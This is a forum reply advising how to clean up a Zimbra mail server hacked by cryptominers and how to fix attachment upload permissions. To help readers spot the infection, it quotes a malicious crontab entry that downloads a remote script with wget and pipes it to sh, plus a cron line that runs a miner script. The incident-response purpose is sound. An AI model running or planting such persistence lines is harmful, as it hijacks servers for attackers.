Well, it seems to be the sympthom of hack. First of all, you should update your zimbra to the latest version and patch it. But it's not enough to solve the problem. You have to look for the wierd or new files, particularly with .pl or .sh extensions. I have seen several hacked zimbra servers with similar symthoms. And as far as I know, there's no automated way to restore the system. One must do some hand operations.
Before you start, read the following articles:https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/https://lorenzo.mile.si/zimbra-zmcat-zm ... -cpu/1018/https://forums.zimbra.com/viewtopic.php?f=15&t=66251viewtopic.php?t=66005viewtopic.php?t=66031viewtopic.php?t=65932&start=140
Control your CPU load. If it's abnormally high, find the process, which loads it.
Probably you'll have to look for the *.sh files in ~/log/ , for example, /opt/zimbra/log/zmswatch.sh
Delete it if exists, because it's a viral script by bitcoin miners, burn'em in hell to the end of days.
If your CPU load becomes normal, that's all right, let's continue.
Have a look at zimbra crontab file (crontab -e).
In the very end of it you may see the line(s)
* * * * * wget -q -O - http://18.104.22.168:443/cr.sh
| sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh
(They may be in the VERY-VERY end, thousands lines down. So simly cat the file /var/spool/cron/zimbra , if it has suspicious lines, it has been haked).
Then regenerate your crontab file this way: https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
After all theese steps you may have to do some additional ones, because the hackers may change some files and/or locations. The best practice here is to move your mailboxes to the totally new installation.
BUT, returning to your question,
The problem of attachment and resend messages lays in wrong permissions for the /opt/zimbra/data/tmp/upload/ directory.
So execute as root
Code: Select all
chmod -R 755 /opt/zimbra/data/tmp/upload/
- and that's it.
Maybe you'll have to change permissions even for the whole tmp directory:
Code: Select all
chmod -R 755 /opt/zimbra/data/tmp/
Sorry for my English.